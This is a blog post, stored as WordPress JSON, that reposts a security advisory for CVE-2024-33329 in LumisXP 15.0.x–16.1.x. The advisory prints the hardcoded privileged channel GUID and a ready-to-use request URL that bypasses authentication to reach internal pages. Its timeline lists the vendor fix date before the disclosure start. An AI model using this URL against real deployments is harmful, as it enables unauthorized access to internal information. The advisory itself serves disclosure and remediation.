{"id":58135,"date":"2024-07-11T18:10:05","date_gmt":"2024-07-11T15:10:05","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179503\/TSI-ADV062024-CVE-2024-33329.txt"},"modified":"2024-07-11T18:10:05","modified_gmt":"2024-07-11T15:10:05","slug":"lumisxp-16-1-x-hardcoded-credentials-idor","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/lumisxp-16-1-x-hardcoded-credentials-idor\/","title":{"rendered":"LumisXP 16.1.x Hardcoded Credentials \/ IDOR"},"content":{"rendered":"

=====[ Tempest Security Intelligence – ADV-6\/2024
]==========================<\/p>\n

LumisXP v15.0.x to v16.1.x<\/p>\n

Author: Rodolfo Tavares<\/p>\n

Tempest Security Intelligence – Recife, Pernambuco – Brazil<\/p>\n

=====[ Table of Contents]==================================================<\/p>\n

Overview
Detailed description
Timeline of disclosure
Thanks & Acknowledgements
References
=====[ Vulnerability
Information]=============================================<\/p>\n

Class: Use of Hard-coded Credentials
(‘Use of Hard-coded Credentials’) [CWE-798]CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:N\/A:N – 5.3
=====[ Overview]========================================================<\/p>\n

System affected : LumisXP
Software Version : Version – v15.0.x to v16.1.x
Impacts :
Vulnerability: A hardcoded privileged ID within Lumisxp v15.0.x to v16.1.x
allows attackers to bypass authentication and access internal pages and
other sensitive information
=====[ Detailed
description]=================================================<\/p>\n

IDOR
http:\/\/localhost.com\/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=
:
Access the link by inserting the GUID into the lumChannelId= parameter.
1 – Access your target using the following GUID (
00000000F00000000000000000000002 )
“`
http:\/\/localhost.com\/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=
“`
2 – Verify that in the request response you will have access to various
component information and internal information about one or several domains.<\/p>\n

=====[ Timeline of
disclosure]===============================================<\/p>\n

2\/Apr\/2024 – Responsible disclosure was initiated with the vendor.
12\/Apr\/2024 – LumisXP Support confirmed the issue;
16\/Fev\/2024 – The vendor fixed the vulnerability
29\/May\/2024 – CVEs was assigned and reserved as CVE-2024-33329<\/p>\n

=====[ Thanks & Acknowledgements]========================================<\/p>\n

Tempest Security Intelligence [1]Rodolfo Tavares
Niklas Correa
=====[ References ]=====================================================<\/p>\n[1][ https:\/\/cwe.mitre.org\/data\/definitions\/798.html
[2][ https:\/\/www.tempest.com.br][3][Thanks Filipe X.]\n

=====[ EOF ]===========================================================<\/p>\n

—<\/p>\n

— <\/p>\n

*Esta mensagem \u00e9 para uso exclusivo de seu destinat\u00e1rio e pode conter
informa\u00e7\u00f5es privilegiadas e confidenciais. Todas as informa\u00e7\u00f5es aqui
contidas devem ser tratadas como confidenciais e n\u00e3o devem ser divulgadas a
terceiros sem o pr\u00e9vio consentimento por escrito da Tempest. Se voc\u00ea n\u00e3o \u00e9
o destinat\u00e1rio n\u00e3o deve distribuir, copiar ou arquivar a mensagem. Neste
caso, por favor, notifique o remetente da mesma e destrua imediatamente a
mensagem.*<\/p>\n

*
*
*This message is intended solely for the use of its
addressee and may contain privileged or confidential information. All
information contained herein shall be treated as confidential and shall not
be disclosed to any third party without Tempest\u2019s prior written approval.
If you are not the addressee you should not distribute, copy or file this
message. In this case, please notify the sender and destroy its contents
immediately.**
*
*
*<\/p>\n","protected":false},"excerpt":{"rendered":"

=====[ Tempest Security Intelligence – ADV-6\/2024]========================== LumisXP v15.0.x to v16.1.x Author: Rodolfo Tavares Tempest Security Intelligence – Recife, Pernambuco – Brazil =====[ Table of Contents]================================================== OverviewDetailed descriptionTimeline of disclosureThanks & AcknowledgementsReferences=====[ VulnerabilityInformation]============================================= Class: Use of Hard-coded Credentials(‘Use of Hard-coded Credentials’) [CWE-798]CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:N\/A:N – 5.3=====[ Overview]======================================================== System affected : LumisXPSoftware Version : Version – v15.0.x to v16.1.xImpacts …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58135","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58135","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58135"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58135\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58135"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58135"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58135"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}